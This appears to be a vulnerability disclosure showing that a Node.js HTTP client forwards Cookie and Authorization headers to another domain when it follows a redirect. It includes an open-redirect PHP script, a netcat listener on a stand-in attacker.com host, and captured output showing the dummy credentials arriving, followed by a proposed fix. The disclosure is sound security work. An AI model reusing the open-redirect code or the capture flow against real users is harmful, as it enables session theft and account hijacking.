Cookie header leaked to third party site and it allow to hijack victim account
When fetching a remote url with Cookie if it get Location
response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.
Ex: you try to fetch example.com
with cookie and if it get redirect url to attacker.com
then it fetch that redirect url with provided cookie .
So, Cookie of example.com
is leaked to attacker.com
.
Cookie is standard way to authentication into webapp and you should not leak to other site .
All browser follow same-origin-policy so that when redirect happen browser does not send cookie of example.com
to attacker.com
.
if you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .
First setup a webserver and a netcat listner
//redirect.php
<?php
$url=$_GET["url"];
header("Location: $url");
/* Make sure that code below does not get executed when we redirect. */
exit;
?>
nc -lnvp 8182
run bellow code
get({
url: 'http://mysite.com/redirect.php?url=http://attacker.com:8182',
method: 'POST',
body: 'this is the POST body',
// simple-get accepts all options that node.js `http` accepts
// See: http://nodejs.org/api/http.html#http_http_request_options_callback
headers: {
'user-agent': 'my cool app',
'Authorization':'Basic asdada=',
'Cookie': 'asdad=asda'
}
}, function (err, res) {
if (err) throw err
// All properties/methods from http.IncomingResponse are available,
// even if a gunzip/inflate transform stream was returned.
// See: http://nodejs.org/api/http.html#http_http_incomingmessage
res.setTimeout(10000)
console.log(res.headers)
res.on('data', function (chunk) {
// `chunk` is the decoded response, after it's been gunzipped or inflated
// (if applicable)
console.log('got a chunk of the response: ' + chunk)
})
})
response received in attacker netcat
Connection from 127.0.0.1 35860 received!
GET / HTTP/1.1
accept-encoding: gzip, deflate
user-agent: my cool app
authorization: Basic asdada=
cookie: asdad=asda
Host: localhost:8182
Connection: close
So, here i provided cookie/Authorization for mysite.com
but does to redirect it leaks to thirdparty site attacker.com
If provided url domain and redirect url domain is same then you can only send cookie/authorization header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie/Authorization header.